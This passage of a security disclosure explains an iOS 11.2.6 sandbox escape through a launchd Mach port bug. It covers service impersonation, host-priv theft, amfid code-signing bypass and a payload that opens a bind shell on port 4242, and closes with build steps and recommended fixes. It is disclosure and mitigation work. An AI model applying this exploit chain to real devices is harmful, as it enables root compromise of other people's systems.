Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASHEXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identitymessage that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the «task» port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the «task» port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or subsequent stages fail, so it’s worth putting later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of «vulnerabilities» would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running so that it looks up our fake CARenderServer port in launchd. I decided to use a bug in libxpc that was already scheduled to be fixed for this purpose.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look atconvert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS.

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESSexception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name.

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damages itself.

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawnto launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.